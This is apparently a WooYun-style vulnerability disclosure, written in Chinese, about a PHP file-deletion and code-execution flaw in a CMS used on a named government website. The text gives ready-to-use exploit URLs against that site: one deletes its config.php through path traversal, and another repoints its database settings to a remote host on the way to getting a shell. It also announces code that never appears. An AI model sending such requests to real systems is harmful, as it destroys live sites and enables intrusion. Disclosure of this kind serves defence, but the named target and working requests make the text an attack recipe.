看这里,看这里 ...
WooYun: 某Gov在用系统存在PHP代码执行漏洞
在网站根目录当中有一个picup.php文件
其中headinc.php文件里面没有权限限制。
代码如下:
看其中变量赋值方式..
所以直接即访问:www.jjqjcy.gov.cn/picup.php?action=del&pic=../includes/config.php
(千万别访问,一访问,网站就挂了)
第二部、远程搭建一个该类型数据库
然后重新赋值以下几个变量
如采用
www.jjqjcy.gov.cn/picup.php?action=del&pic=../includes/config.php&dbhost=3.3.3.3&dbuname=3333&dbpass=3333&dbname=dddd
找到网站当中的其他eval函数,控制该数据库某变量即可getshell(其中找eval测试我就不提供了)。。这样会导致很多站挂。。。(请参考13年qibocms getshell)
太黄太暴力,各位测试的需小心...本文只提供思路...后果自负..